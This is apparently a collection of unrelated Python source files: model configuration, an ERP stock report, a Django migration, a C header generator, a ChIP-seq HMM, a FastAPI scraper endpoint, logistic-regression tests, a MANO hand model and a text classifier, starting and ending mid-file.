            out_fft_n_heads=args.out_fft_n_heads,
            out_fft_d_head=args.out_fft_d_head,
            out_fft_conv1d_kernel_size=args.out_fft_conv1d_kernel_size,
            out_fft_conv1d_filter_size=args.out_fft_conv1d_filter_size,
            out_fft_output_size=args.out_fft_output_size,
            p_out_fft_dropout=args.p_out_fft_dropout,
            p_out_fft_dropatt=args.p_out_fft_dropatt,
            p_out_fft_dropemb=args.p_out_fft_dropemb,
            # duration predictor
            dur_predictor_kernel_size=args.dur_predictor_kernel_size,
            dur_predictor_filter_size=args.dur_predictor_filter_size,
            p_dur_predictor_dropout=args.p_dur_predictor_dropout,
            dur_predictor_n_layers=args.dur_predictor_n_layers,
            # pitch predictor
            pitch_predictor_kernel_size=args.pitch_predictor_kernel_size,
            pitch_predictor_filter_size=args.pitch_predictor_filter_size,
            p_pitch_predictor_dropout=args.p_pitch_predictor_dropout,
            pitch_predictor_n_layers=args.pitch_predictor_n_layers,
            # pitch conditioning
            pitch_embedding_kernel_size=args.pitch_embedding_kernel_size,
            # speakers parameters
            n_speakers=args.n_speakers,
            speaker_emb_weight=args.speaker_emb_weight
        )
        return model_config
    else:
        raise NotImplementedError(model_name)
|
# Copyright (c) 2013, Frappe Technologies Pvt. Ltd. and contributors
# For license information, please see license.txt
from __future__ import unicode_literals
import frappe
from frappe import _
def execute(filters=None):
    """Report entry point: return (columns, rows) for the given filters."""
    filters = filters or {}
    validate_filters(filters)
    return get_columns(), get_total_stock(filters)
def get_columns():
    """Column definitions in frappe's "Label:Type/Options:Width" format."""
    return [
        _("Company") + ":Link/Company:250",
        _("Warehouse") + ":Link/Warehouse:150",
        _("Item") + ":Link/Item:150",
        _("Description") + "::300",
        _("Current Qty") + ":Float:100",
    ]
def get_total_stock(filters):
    """Aggregate Bin quantities, grouped either by warehouse or by company.

    Returns raw SQL rows of (company, warehouse, item_code, description, qty),
    matching the column order of ``get_columns``.
    """
    conditions = ""
    columns = ""
    if filters.get("group_by") == "Warehouse":
        if filters.get("company"):
            # The company value is escaped (and quoted) by frappe.db.escape
            # before being interpolated into the SQL string.
            conditions += " AND warehouse.company = %s" % frappe.db.escape(filters.get("company"), percent=False)
        conditions += " GROUP BY ledger.warehouse, item.item_code"
        columns += "'' as company, ledger.warehouse"
    else:
        conditions += " GROUP BY warehouse.company, item.item_code"
        columns += " warehouse.company, '' as warehouse"
    # `columns` and `conditions` are built only from the fixed strings above
    # plus the escaped company value, so no raw user input reaches the SQL.
    return frappe.db.sql("""
        SELECT
            %s,
            item.item_code,
            item.description,
            sum(ledger.actual_qty) as actual_qty
        FROM
            `tabBin` AS ledger
        INNER JOIN `tabItem` AS item
            ON ledger.item_code = item.item_code
        INNER JOIN `tabWarehouse` warehouse
            ON warehouse.name = ledger.warehouse
        WHERE
            actual_qty != 0 %s""" % (columns, conditions))
def validate_filters(filters):
    """Reject a company filter when the report is grouped by company."""
    grouped_by_company = filters.get("group_by") == 'Company'
    if grouped_by_company and filters.get("company"):
        frappe.throw(_("Please set Company filter blank if Group By is 'Company'"))
|
# Generated by Django 3.0.5 on 2020-04-26 13:00
from django.db import migrations, models
class Migration(migrations.Migration):
    """Replace the free-form `temperature` field with the categorical
    `temperature_pills` field and tighten several profile fields to integers."""

    dependencies = [
        ('covidus_main', '0001_initial'),
    ]

    operations = [
        # Drop the old field before introducing its categorical replacement.
        migrations.RemoveField(
            model_name='profile',
            name='temperature',
        ),
        # NOTE(review): the first choice value '34.0' does not follow the
        # "range°C" pattern of the other choices — confirm this is intended
        # before any data depends on it.
        migrations.AddField(
            model_name='profile',
            name='temperature_pills',
            field=models.CharField(choices=[('34.0', 'Normal'), ('37.5 - 38.0°C', 'Low Fever'), ('38.1-39.0°C', 'High Fever'), ('>39.0°C', 'Very High Fever')], default=None, max_length=20),
        ),
        migrations.AlterField(
            model_name='profile',
            name='age',
            field=models.IntegerField(),
        ),
        migrations.AlterField(
            model_name='profile',
            name='current_postalcode',
            field=models.IntegerField(),
        ),
        migrations.AlterField(
            model_name='profile',
            name='height',
            field=models.IntegerField(),
        ),
        migrations.AlterField(
            model_name='profile',
            name='postal_code',
            field=models.IntegerField(),
        ),
        migrations.AlterField(
            model_name='profile',
            name='weight',
            field=models.IntegerField(),
        ),
    ]
|
"""
Copyright (c) 2020-2021 Deutsches Elektronen-Synchrotron DESY.
See LICENSE.txt for license details.
"""
import datetime
import getpass
import os
import socket
from typing import Iterator, List, Optional
from systemrdl.rdltypes import AccessType
from hectare._hectare_types import AddressMap, Field, Register
def indent_lines(ls: List[str], ident_level: int) -> Iterator[str]:
    """Yield each line of *ls* prefixed with *ident_level* spaces."""
    prefix = " " * ident_level
    for line in ls:
        yield prefix + line
class HectareCHeaderGen:
    """Generates a C header of #define constants from a parsed SystemRDL
    address map: register addresses, reset values, field shifts and masks.

    The exact text layout of the output is part of the contract (generated
    headers are diffed/committed), so formatting here is deliberate.
    """

    def __init__(self, addrmap, input_filename=""):
        # addrmap: AddressMap whose .name and .regs (each with .fields) drive
        # the generated constant names.
        self.addrmap = addrmap
        self.cur_indent = 0
        self.data_w_bytes = 4  # 32 / 8 # TODO check regwidth
        # Recorded in the banner so readers can trace the generated header
        # back to its RDL source.
        self.input_filename = input_filename

    def generate_string(self) -> str:
        """Return the complete header file contents as a single string."""
        s = ""
        s += self._gen_header(self.input_filename)
        s += "\n"
        s += "#pragma once\n"
        s += "\n\n// address constants\n"
        s += "\n".join(self._gen_reg_addr())
        s += "\n"
        s += "\n\n// reset values\n"
        s += "\n".join(self._gen_reg_reset_vals())
        s += "\n\n// individual field shift\n"
        s += "\n".join(self._gen_field_shift())
        s += "\n\n// individual field mask\n"
        s += "\n".join(self._gen_field_mask())
        return s

    @staticmethod
    def _gen_header(input_filename: str, verbose: bool = False) -> str:
        """Banner comment; *verbose* adds date/host/user (at the cost of
        reproducible output)."""
        s = "/* This file was automatically generated with HECTARE\n"
        s += " *\n"
        s += " * DO NOT EDIT\n"
        s += " *\n"
        s += " * input_filename = {0}\n".format(input_filename)
        if verbose:
            s += " * date = {0}\n".format(datetime.datetime.now().ctime())
            s += " * hostname = {0}\n".format(socket.gethostname())
            s += " * user = {0}\n".format(getpass.getuser())
        s += " */\n"
        return s

    def _gen_reg_addr(self) -> List[str]:
        """One address #define line per register."""
        comp_name = self.addrmap.name.upper()
        return [self._gen_single_addr(comp_name, reg) for reg in self.addrmap.regs]

    def _gen_reg_reset_vals(self) -> List[str]:
        # we only generate those for the values with hw=na, sw=r
        comp_name = self.addrmap.name.upper()
        reset_vals = []
        for reg in self.addrmap.regs:
            line_added = False
            for field in reg.fields:
                if field.sw_acc_type == AccessType.r and field.hw_acc_type == AccessType.na:
                    reset_vals.append(self._gen_single_reg_reset_vals(comp_name, reg.name, field))
                    line_added = True
            # to make this prettier, we only add an empty line after a group of "#define"-s
            if line_added:
                line_added = False
                reset_vals.append("")
        return reset_vals

    def _gen_field_shift(self) -> List[str]:
        """One shift #define per field, blank line between registers."""
        comp_name = self.addrmap.name.upper()
        field_shifts = []
        for reg in self.addrmap.regs:
            for field in reg.fields:
                field_shifts.append(
                    self._gen_single_field_shift(comp_name, reg.name, field)
                )
            field_shifts.append("")
        return field_shifts

    def _gen_field_mask(self) -> List[str]:
        """One (unshifted) mask #define per field, blank line between registers."""
        comp_name = self.addrmap.name.upper()
        field_mask = []
        for reg in self.addrmap.regs:
            for field in reg.fields:
                field_mask.append(
                    self._gen_single_field_mask(comp_name, reg.name, field)
                )
            field_mask.append("")
        return field_mask

    @staticmethod
    def _gen_single_enum_type(field: Field) -> str:
        # TODO not implemented yet; currently returns None.
        pass

    @staticmethod
    def _gen_single_addr(comp_name: str, reg: Register) -> str:
        """ Generate an address constant for a single register
        E.g. #define MOD_ADDR_SCRATCH (0x1C)
        """
        return "#define {comp_name}_ADDR_{name} ({byte_addr})".format(
            comp_name=comp_name, name=reg.name.upper(), byte_addr=reg.addr
        )

    @staticmethod
    def _gen_single_reg_reset_vals(comp_name: str, reg_name: str, field: Field) -> str:
        """ Generate a reset values (can be used to check if matches in SW)
        this functions expects that a field has a reset value
        """
        assert field.reset is not None
        return "#define {comp_name}_{reg_name}_{field_name}_RST_VAL (0x{rst_val:x})".format(
            comp_name=comp_name,
            reg_name=reg_name,
            field_name=field.name.upper(),
            rst_val=field.reset,
        )

    @staticmethod
    def _gen_single_field_shift(comp_name: str, reg_name: str, field: Field) -> str:
        """Shift constant: the field's LSB position within its register."""
        return "#define {comp_name}_{reg_name}_{field_name}_SHIFT ({shift})".format(
            comp_name=comp_name,
            reg_name=reg_name,
            field_name=field.name.upper(),
            shift=field.lsb,
        )

    @staticmethod
    def _gen_single_field_mask(comp_name: str, reg_name: str, field: Field) -> str:
        """Mask constant for the field width (not shifted to its position)."""
        mask = (1 << (field.msb - field.lsb + 1)) - 1
        return "#define {comp_name}_{reg_name}_{field_name}_MASK (0x{mask:x})".format(
            comp_name=comp_name,
            reg_name=reg_name,
            field_name=field.name.upper(),
            mask=mask,
        )
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
THOR detects differential peaks in multiple ChIP-seq profiles associated
with two distinct biological conditions.
Copyright (C) 2014-2016 Manuel Allhoff (allhoff@aices.rwth-aachen.de)
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>.
@author: Manuel Allhoff
"""
from __future__ import print_function
import sys
import string
import numpy as np
from scipy.stats import binom
from hmmlearn.hmm import _BaseHMM
from help_hmm import _valid_posteriors
def get_init_parameters(s1, s2, **info):
    """Derive initial binomial parameters (n, p) for the HMM from two samples.

    :param s1: sequence of tuples for condition 1; column 0 is used
    :param s2: sequence of tuples for condition 2; column 1 is used
    :param info: must contain 'count', the binomial n for both conditions
    :return: (n_, p_) as numpy arrays; p_ has shape (2 emissions, 3 states)
    """
    n_ = np.array([info['count'], info['count']])
    # get observation that occurs most often.
    # Bug fix: wrap map() in list() — on Python 3, map() is a lazy iterator
    # and np.bincount(map(...)) raises a TypeError.
    m_ = [float(np.argmax(np.bincount(list(map(lambda x: x[0], s1))))),
          float(np.argmax(np.bincount(list(map(lambda x: x[1], s2)))))]
    p_ = [[-1, -1, -1], [-1, -1, -1]]  # first: 1. or 2. emission, second: state
    p_[0][0] = 1. / n_[0]
    p_[1][0] = 1. / n_[1]
    p_[0][1] = m_[0] / n_[0]
    p_[1][1] = p_[1][0]
    p_[0][2] = p_[0][0]
    p_[1][2] = m_[1] / n_[1]
    return np.asarray(n_), np.asarray(p_)
class BinomialHMM(_BaseHMM):
    """HMM whose emissions are vectors of binomially distributed counts from
    two experimental conditions.

    ``dim_cond_1``/``dim_cond_2`` give how many observation columns belong to
    each condition; ``n`` and ``p`` are the per-condition binomial parameters
    (one ``p`` entry per HMM state).
    """

    def __init__(self, n, p, dim_cond_1, dim_cond_2, init_state_seq=None, n_components=2, covariance_type='diag', startprob_prior=None, transmat_prior=None,
                 algorithm="viterbi", means_prior=None, means_weight=0,
                 covars_prior=1e-2, covars_weight=1,
                 random_state=None, n_iter=10, thresh=1e-2,
                 params=string.ascii_letters,
                 init_params=string.ascii_letters):
        _BaseHMM.__init__(self, n_components,
                          startprob_prior=startprob_prior,
                          transmat_prior=transmat_prior, algorithm=algorithm,
                          random_state=random_state, n_iter=n_iter,
                          tol=thresh, params=params,
                          init_params=init_params)
        self.dim = [dim_cond_1, dim_cond_2]  # dimension of one emission
        self.n = n
        self.p = p
        self.n_features = 2  # emission dimension
        self.init_state_seq = init_state_seq
        self.count_s1, self.count_s2 = 0, 0
        self.lookup_logpmf = {}  # memoizes binom.logpmf per (obs, p, n) triple

    def _compute_log_likelihood(self, X):
        """Return the (len(X), n_components) log-likelihood matrix."""
        res = []
        for x in X:  # over all observations
            row = []
            for i in range(self.n_components):  # over number of HMM's state
                r_sum = 0
                for j in range(self.n_features):  # over dim
                    it = range(self.dim[0]) if j == 0 else range(self.dim[0], self.dim[0] + self.dim[1])  # grab proper observation
                    for k in it:
                        index = (int(x[k]), self.p[j][i], self.n[j])
                        # Bug fix: dict.has_key() was removed in Python 3;
                        # the `in` operator is equivalent on Python 2 and 3.
                        if index not in self.lookup_logpmf:
                            self.lookup_logpmf[index] = binom.logpmf(x[k], self.n[j], self.p[j][i])
                        r_sum += self.lookup_logpmf[index]
                row.append(r_sum)
            res.append(row)
        return np.asarray(res)

    def _generate_sample_from_state(self, state, random_state=None):
        """Draw a single emission vector for *state*."""
        output = []
        for i, d in enumerate(self.dim):
            for _ in range(d):
                output.append(binom.rvs(self.n[i], self.p[i][state]))
        return np.asarray(output)

    def _initialize_sufficient_statistics(self):
        stats = super(BinomialHMM, self)._initialize_sufficient_statistics()
        stats['post'] = np.zeros([self.n_components])
        stats['post_emission'] = np.zeros([self.n_features, self.n_components])
        return stats

    def _help_accumulate_sufficient_statistics(self, obs, stats, posteriors):
        # NOTE(review): stats['post'] is incremented once per observation
        # column (inside the inner loop); confirm this weighting is intended
        # rather than once per observation.
        for t, symbol in enumerate(obs):
            pot_it = [range(self.dim[0]), range(self.dim[0], self.dim[0] + self.dim[1])]  # consider both classes
            for j, it in enumerate(pot_it):
                for i in it:
                    stats['post'] += posteriors[t]
                    stats['post_emission'][j] += posteriors[t] * symbol[i]
        stats['posterior'] = np.copy(posteriors)

    def _accumulate_sufficient_statistics(self, stats, obs, framelogprob,
                                          posteriors, fwdlattice, bwdlattice
                                          ):
        super(BinomialHMM, self)._accumulate_sufficient_statistics(
            stats, obs, framelogprob, posteriors, fwdlattice, bwdlattice
        )
        # Re-validate posteriors before folding them into the statistics.
        posteriors = _valid_posteriors(posteriors, obs, self.dim)
        self._help_accumulate_sufficient_statistics(obs, stats, posteriors)

    @staticmethod
    def _add_pseudo_counts(arr):
        # Bug fix: declared @staticmethod — this helper takes no `self` but is
        # invoked as self._add_pseudo_counts(...) in _help_do_mstep, which
        # would raise TypeError for a plain instance method.
        # Clamps values away from zero so later divisions cannot blow up.
        if type(arr) is np.ndarray:
            tmp = np.array([1e-323 if x < 1e-323 else x for x in arr], np.float64)
            # tmp2 = np.array([1.0 - 1.0e-5 if x == 1.0 else x for x in tmp], np.float64)
            return tmp
        else:
            tmp = 1e-323 if arr < 1e-323 else arr
            # tmp2 = 1.0 - 1.0e-10 if tmp == 1.0 else tmp
            return tmp

    def _help_do_mstep(self, stats):
        # Re-estimate emission probabilities from the accumulated statistics.
        for i in range(self.n_features):
            self.p[i] = stats['post_emission'][i] / (self.n[i] * self._add_pseudo_counts(stats['post']))
            print('help_m_step', i, stats['post_emission'][i], stats['post'], self.p[i], file=sys.stderr)

    def _do_mstep(self, stats):
        super(BinomialHMM, self)._do_mstep(stats)
        self._help_do_mstep(stats)
        # Tie emission parameters across the two conditions/states.
        self.p[0, 0] = self.p[1, 0]
        self.p[0, 1] = self.p[1, 2]
        self.p[1, 1] = self.p[0, 2]
if __name__ == '__main__':
    # Smoke test: sample 100 observations from one HMM, then fit a second
    # HMM on the sample and compare predicted states against the truth.
    p_ = np.array([[0.01, 0.8, 0.1], [0.01, 0.1, 0.8]])
    n_ = np.array([100, 100])
    # NOTE(review): __init__ has no `startprob` keyword — this call looks like
    # it would raise TypeError; confirm against the _BaseHMM version in use.
    m = BinomialHMM(n_components=3, p = p_, startprob=[1,0,0], n = n_, dim_cond_1=2, dim_cond_2=4)
    X, Z = m.sample(100) #returns (obs, hidden_states)
    # Start the re-fit from deliberately different emission parameters.
    p_ = np.array([[0.1, 0.7, 0.3], [0.1, 0.2, 0.9]])
    n_ = np.array([100, 100])
    m2 = BinomialHMM(n_components=3, n=n_, p=p_, dim_cond_1=2, dim_cond_2=4)
    #cProfile.run("m2.fit([X])")
    m2.fit([X])
    e = m2.predict(X)
    print(m2.p)
    for i, el in enumerate(X):
        print(el, Z[i], e[i], Z[i] == e[i], sep='\t')
#     logprob, posteriors = m2.eval(X)
#     print('logprob:', logprob)
#     print('posteriors:', posteriors)
#     print('estim. states ', m2.predict(X))
#     print(m2.predict_proba(X))
#     print(m2.n)
#     print(m2.p)
#     print(m2._get_transmat())
#     init_state = m2.predict(X)
#     m3 = BinomialHMM2d3s(n_components=3, n=n_)
#     m3.fit([X], init_params='advanced')
#     print(m3._get_transmat())
#     print(m3.p)
#     m2.eval(X)
|
from __future__ import annotations
from typing import Optional
from jsonclasses import jsonclass, types
@jsonclass
class SimpleWordbook:
    """A wordbook with an optional name and a non-null list of words."""
    # Optional display name of the wordbook.
    name: Optional[str]
    # Words in the book; `nonnull` guarantees the list itself is never None.
    words: list[str] = types.nonnull.listof(str)
|
from datetime import date
from typing import Optional
from fastapi import FastAPI
from fastapi.responses import RedirectResponse
from road_data_scraper import __version__
from road_data_scraper.main import run
# FastAPI application exposing the road-data scraping pipeline over HTTP.
app = FastAPI(
    title="Road Data Scraper API",
    description="Scrapes and Cleans WebTRIS Traffic Flow API",
    version=__version__,
)
@app.get("/", tags=["Road Data Scraper"])
def read_docs():
    """Send visitors of the API root straight to the interactive docs."""
    docs_redirect = RedirectResponse("/docs")
    return docs_redirect
@app.get("/scrape/", tags=["Road Data Scraper"])
def scrape_webtris_api(
    test_run: bool,
    generate_report: bool,
    output_path: str,
    rm_dir: bool,
    gcp_storage: bool,
    # Bug fix: the date defaults were "" (a str), contradicting the
    # Optional[date] annotation; None is the correct "not provided" value.
    start_date: Optional[date] = None,
    end_date: Optional[date] = None,
    gcp_credentials: Optional[str] = None,
    gcp_bucket_name: Optional[str] = None,
    gcp_blob_name: Optional[str] = "landing_zone",
):
    """Run the WebTRIS scraping pipeline with the given settings.

    Dates are serialized to ISO strings for the pipeline config; omitted
    dates are passed through as "" (preserving the previous behaviour).
    Returns a success message once the pipeline finishes.
    """
    config = {
        "user_settings": {
            "start_date": str(start_date) if start_date else "",
            "end_date": str(end_date) if end_date else "",
            "test_run": test_run,
            "generate_report": generate_report,
            "output_path": output_path,
            "rm_dir": rm_dir,
            "gcp_storage": gcp_storage,
            "gcp_credentials": gcp_credentials,
            "gcp_bucket_name": gcp_bucket_name,
            "gcp_blob_name": gcp_blob_name,
        }
    }
    run(config, api_run=True)
    return "WebTRIS Scraping Pipeline Successfully Executed."
|
import sys
from karp5 import instance_info
from .config import Config
from .configmanager import ConfigManager
# print(f"{instance_info.get_instance_path()}")
# Single shared ConfigManager built from the karp5 instance path;
# `conf_mgr` is the alias other karp5 modules import.
mgr = ConfigManager(instance_info.get_instance_path())
conf_mgr = mgr
|
"""
Write your logreg unit tests here. Some examples of tests we will be looking for include:
* check that fit appropriately trains model & weights get updated
* check that predict is working
More details on potential tests below, these are not exhaustive
"""
import numpy as np
import pandas as pd
from regression import (logreg, utils)
from sklearn.preprocessing import StandardScaler
def test_updates():
    """
    Check training of the model: gradients change over training, final losses
    are reasonable, and the training loss decreases once stabilized.
    """
    np.random.seed(42) #set random seed for reproducibility
    #create a logistic regression object with the following data
    X_train, X_val, y_train, y_val = utils.loadDataset(features=['Penicillin V Potassium 500 MG',
                                                                 'Computed tomography of chest and abdomen',
                                                                 'Plain chest X-ray (procedure)',
                                                                 'Low Density Lipoprotein Cholesterol',
                                                                 'Creatinine',
                                                                 'AGE_DIAGNOSIS'],
                                                       split_percent=0.8, split_state=42)
    # scale data since values vary across features
    sc = StandardScaler()
    X_train = sc.fit_transform(X_train)
    X_val = sc.transform (X_val)
    #create object
    log_model = logreg.LogisticRegression(num_feats=6, max_iter=150, tol=0.0001, learning_rate=0.05, batch_size=12)
    #train model
    log_model.train_model(X_train, y_train, X_val, y_val)
    #Check that your gradient is being calculated correctly
    gradients = log_model.grad_history #get the stored gradient steps
    #assert that the first array of gradients is not the same as the last array of gradients (i.e. assert that the gradients changed)
    comparison = gradients[0]==gradients[len(gradients)-1]
    arrays_are_equal = comparison.all() #compares all array values to make sure they are equal at the same indices
    assert arrays_are_equal==False
    #Check that your loss function is correct and that you have reasonable losses at the end of training
    #i.e. check that the min training and validation loss are under 5 and 200, respectively with the given hyperparameters
    assert min(log_model.loss_history_train)<5
    assert min(log_model.loss_history_val)<200
    #Check to see if your training losses approach zero (look at the loss_history_train vector) and are generally decreasing
    # NOTE(review): max_iter=150 but the strict-decrease check only starts at
    # i>200 — if loss_history_train holds one entry per iteration this loop
    # never asserts anything; confirm the history is recorded per batch.
    prev_num = 0.0
    current_num = 0.0
    for i in range(0,len(log_model.loss_history_train)):
        current_num = log_model.loss_history_train[i]
        #tends to stabilize around i=200, so start checking for decreasing values there
        if i>200:
            assert current_num<prev_num
        prev_num = current_num
def test_predict():
    """
    Verify that training updates the model weights and that predictions are
    valid probabilities yielding the expected accuracy range.
    """
    np.random.seed(42)  # set random seed for reproducibility
    # Load the dataset with the selected clinical feature columns.
    X_train, X_val, y_train, y_val = utils.loadDataset(
        features=['Penicillin V Potassium 500 MG',
                  'Computed tomography of chest and abdomen',
                  'Plain chest X-ray (procedure)',
                  'Low Density Lipoprotein Cholesterol',
                  'Creatinine',
                  'AGE_DIAGNOSIS'],
        split_percent=0.8, split_state=42)
    # Scale data since values vary across features.
    sc = StandardScaler()
    X_train = sc.fit_transform(X_train)
    X_val = sc.transform(X_val)
    log_model = logreg.LogisticRegression(num_feats=6, max_iter=150, tol=0.0001,
                                          learning_rate=0.05, batch_size=12)
    # Snapshot initial weights; .copy() guards against in-place updates of W
    # making the "before" and "after" arrays the same object.
    original_weights = log_model.W.copy()
    log_model.train_model(X_train, y_train, X_val, y_val)
    new_weights = log_model.W
    # Weights must have been updated by training.
    assert not (original_weights == new_weights).all()
    # Predictions are probabilities, so every value must lie in [0, 1].
    y_pred = log_model.make_prediction(X_val)
    assert np.amin(y_pred) >= 0
    assert np.amax(y_pred) <= 1
    # Binarize with a 0.5 cutoff. np.where builds a new array — the original
    # code aliased y_classified to y_pred and mutated the predictions in place.
    y_classified = np.where(y_pred < 0.5, 0, 1)

    def accuracy(y_classified, y_val):
        # Fraction of predictions matching the true labels.
        return np.sum(y_val == y_classified) / len(y_val)

    # Accuracy for these hyperparameters should fall in [0.845, 0.865].
    assert accuracy(y_classified, y_val) <= 0.865
    assert accuracy(y_classified, y_val) >= 0.845
import numpy as np
import torch
import os.path as osp
import json
from core.config import cfg
from manopth.manolayer import ManoLayer
class MANO(object):
    """Wrapper around the MANO right-hand model exposing its mesh faces,
    a vertex-to-joint regressor augmented with fingertips, and joint
    naming/skeleton metadata."""

    def __init__(self):
        # manopth layer providing the MANO hand mesh model.
        self.layer = self.get_layer()
        self.vertex_num = 778  # MANO mesh vertex count
        self.face = self.layer.th_faces.numpy()  # triangle indices of the mesh
        # Regressor mapping mesh vertices to the MANO joints.
        self.joint_regressor = self.layer.th_J_regressor.numpy()
        self.joint_num = 21  # MANO joints plus the 5 fingertips added below
        self.joints_name = ('Wrist', 'Thumb_1', 'Thumb_2', 'Thumb_3', 'Thumb_4', 'Index_1', 'Index_2', 'Index_3', 'Index_4', 'Middle_1', 'Middle_2', 'Middle_3', 'Middle_4', 'Ring_1', 'Ring_2', 'Ring_3', 'Ring_4', 'Pinky_1', 'Pinky_2', 'Pinky_3', 'Pinky_4')
        # Parent-child joint index pairs forming the kinematic tree.
        self.skeleton = ( (0,1), (0,5), (0,9), (0,13), (0,17), (1,2), (2,3), (3,4), (5,6), (6,7), (7,8), (9,10), (10,11), (11,12), (13,14), (14,15), (15,16), (17,18), (18,19), (19,20) )
        self.root_joint_idx = self.joints_name.index('Wrist')
        # add fingertips to joint_regressor
        self.fingertip_vertex_idx = [745, 317, 444, 556, 673] # mesh vertex idx (right hand)
        # One-hot rows that each select a single fingertip vertex.
        # NOTE(review): middletip_onehot selects vertex 445 while the list
        # above says 444 — confirm which index is intended.
        thumbtip_onehot = np.array([1 if i == 745 else 0 for i in range(self.joint_regressor.shape[1])], dtype=np.float32).reshape(1,-1)
        indextip_onehot = np.array([1 if i == 317 else 0 for i in range(self.joint_regressor.shape[1])], dtype=np.float32).reshape(1,-1)
        middletip_onehot = np.array([1 if i == 445 else 0 for i in range(self.joint_regressor.shape[1])], dtype=np.float32).reshape(1,-1)
        ringtip_onehot = np.array([1 if i == 556 else 0 for i in range(self.joint_regressor.shape[1])], dtype=np.float32).reshape(1,-1)
        pinkytip_onehot = np.array([1 if i == 673 else 0 for i in range(self.joint_regressor.shape[1])], dtype=np.float32).reshape(1,-1)
        # Append the fingertip rows, then reorder all rows to match the
        # joints_name ordering defined above.
        self.joint_regressor = np.concatenate((self.joint_regressor, thumbtip_onehot, indextip_onehot, middletip_onehot, ringtip_onehot, pinkytip_onehot))
        self.joint_regressor = self.joint_regressor[[0, 13, 14, 15, 16, 1, 2, 3, 17, 4, 5, 6, 18, 10, 11, 12, 19, 7, 8, 9, 20],:]

    def get_layer(self):
        """Load the right-hand MANO layer (full pose space, no PCA)."""
        return ManoLayer(mano_root=osp.join(cfg.mano_dir, 'mano', 'models'), flat_hand_mean=False, use_pca=False) # load right hand MANO model
|
from convokit import Corpus, CorpusObject
from sklearn.model_selection import train_test_split, cross_val_score, KFold
from typing import Callable, List
from sklearn.pipeline import Pipeline
from sklearn.preprocessing import StandardScaler
from sklearn.linear_model import LogisticRegression
from sklearn.metrics import confusion_matrix, classification_report
import pandas as pd
from scipy.sparse import vstack, issparse
from .classifier import Classifier
import numpy as np
from .util import extract_feats_and_label_bow
class BoWClassifier(Classifier):
    """
    Transformer that trains a classifier on the Corpus objects' text vector representation (e.g. bag-of-words, TF-IDF, etc)

    Runs on the Corpus's Users, Utterances, or Conversations (as specified by obj_type)

    Inherits from `Classifier` and has access to its methods.

    :param obj_type: "speaker", "utterance", or "conversation"
    :param vector_name: the metadata key where the Corpus object text vector is stored
    :param labeller: a (lambda) function that takes a Corpus object and returns True (y=1) or False (y=0) - i.e. labeller defines the y value of the object for fitting
    :param clf: a sklearn Classifier. By default, clf is a Pipeline with StandardScaler and LogisticRegression
    :param clf_feat_name: the metadata key to store the classifier prediction value under; default: "prediction"
    :param clf_prob_feat_name: the metadata key to store the classifier prediction score under; default: "pred_score"
    """

    def __init__(self, obj_type: str, vector_name="bow_vector",
                 labeller: Callable[[CorpusObject], bool] = lambda x: True,
                 clf=None, clf_feat_name: str = "prediction", clf_prob_feat_name: str = "pred_score"):
        if clf is None:
            print("Initializing default classification model (standard scaled logistic regression)")
            # with_mean=False keeps the scaler compatible with sparse matrices.
            clf = Pipeline([("standardScaler", StandardScaler(with_mean=False)),
                            ("logreg", LogisticRegression(solver='liblinear'))])
        self.vector_name = vector_name
        # pred_feats is empty: features come from the stored vector, not metadata.
        super().__init__(obj_type=obj_type, pred_feats=[], labeller=labeller,
                         clf=clf, clf_feat_name=clf_feat_name, clf_prob_feat_name=clf_prob_feat_name)

    def fit(self, corpus: Corpus, y=None, selector: Callable[[CorpusObject], bool] = lambda x: True):
        """
        Fit the Transformer's internal classifier model on the Corpus objects, with an optional selector that filters for objects to be fit on.

        :param corpus: the target Corpus
        :param selector: a (lambda) function that takes a Corpus object and returns True or False (i.e. include / exclude). By default, the selector includes all objects of the specified type in the Corpus.
        :return: the fitted BoWClassifier
        """
        # collect texts for vectorization
        # NOTE: the `y` parameter is unused; labels come from self.labeller.
        X = []
        y = []
        for obj in corpus.iter_objs(self.obj_type, selector):
            X.append(obj.meta[self.vector_name])
            y.append(self.labeller(obj))
        if issparse(X[0]): # for csr_matrix
            X = vstack(X)
        else: # for non-compressed numpy arrays
            X = np.vstack(X)
        self.clf.fit(X, y)
        return self

    def transform(self, corpus: Corpus, selector: Callable[[CorpusObject], bool] = lambda x: True) -> Corpus:
        """
        Annotate the corpus objects with the classifier prediction and prediction score, with an optional selector
        that filters for objects to be classified. Objects that are not selected will get a metadata value of 'None'
        instead of the classifier prediction.

        :param corpus: the target Corpus
        :param selector: a (lambda) function that takes a Corpus object and returns True or False (i.e. include / exclude). By default, the selector includes all objects of the specified type in the Corpus.
        :return: the target Corpus annotated
        """
        objs = []
        X = []
        for obj in corpus.iter_objs(self.obj_type):
            if selector(obj):
                # Selected objects are predicted on below.
                objs.append(obj)
                X.append(obj.meta[self.vector_name])
            else:
                # Unselected objects are still annotated, with None values.
                obj.add_meta(self.clf_feat_name, None)
                obj.add_meta(self.clf_prob_feat_name, None)
        X = vstack(X)
        # Predicted class and the probability of the positive class (column 1).
        clfs, clfs_probs = self.clf.predict(X), self.clf.predict_proba(X)[:, 1]
        for idx, (clf, clf_prob) in enumerate(list(zip(clfs, clfs_probs))):
            obj = objs[idx]
            obj.add_meta(self.clf_feat_name, clf)
            obj.add_meta(self.clf_prob_feat_name, clf_prob)
        return corpus

    def transform_objs(self, objs: List[CorpusObject]) -> List[CorpusObject]:
        """
        Run classifier on list of Corpus objects and annotate them with the predictions and prediction scores

        :param objs: list of Corpus objects
        :return: list of annotated Corpus objects
        """
        X, _ = extract_feats_and_label_bow(corpus=None, objs=objs, obj_type=None, vector_name=self.vector_name,
                                           labeller=self.labeller, selector=None)
        # Densify the (possibly sparse) feature matrix before predicting.
        X = X.toarray()
        # obj_ids = [obj.id for obj in objs]
        clfs, clfs_probs = self.clf.predict(X), self.clf.predict_proba(X)[:, 1]
        for idx, (clf, clf_prob) in enumerate(list(zip(clfs, clfs_probs))):
            obj = objs[idx]
            obj.add_meta(self.clf_feat_name, clf)
            obj.add_meta(self.clf_prob_feat_name, clf_prob)
        return objs

    def fit_transform(self, corpus: Corpus, y=None, selector: Callable[[CorpusObject], bool] = lambda x: True) -> Corpus:
        """Fit on the selected objects, then annotate them; returns the annotated Corpus."""
